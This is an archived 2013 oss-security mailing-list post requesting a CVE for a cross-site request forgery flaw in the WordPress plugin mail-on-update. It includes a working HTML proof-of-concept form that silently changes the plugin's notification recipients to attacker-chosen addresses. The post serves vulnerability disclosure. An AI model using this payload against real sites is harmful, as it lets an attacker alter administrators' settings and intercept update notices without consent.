Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 16 May 2013 17:06:11 +0300
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Subject: CVE request: WordPress plugin mail-on-update CSRF

Hello,

Can I get 2013 CVE for WordPress plugin mail-on-update CSRF vulnerability. PoC
for "List of alternative recipients" below. Tested 5.1.0 version.

Homepage: http://wordpress.org/extend/plugins/mail-on-update/
Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/

<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update" method="post" class="buttom-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0@...mple.com
example1@...mple.com
example2@...mple.com
example3@...mple.com
example4@...mple.com
example5@...mple.com
example6@...mple.com
example7@...mple.com
example8@...mple.com
example9@...mple.com
example10@...mple.com
henri+monkey@...v.fi" />
<input name="submit" type="submit" value="Save"/></form></html>

If attacker adds random email to that form default user won't get emails and
attacker might be interested to receive these as the email contains information
of available plugin updates.

---
Henri Salo

[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ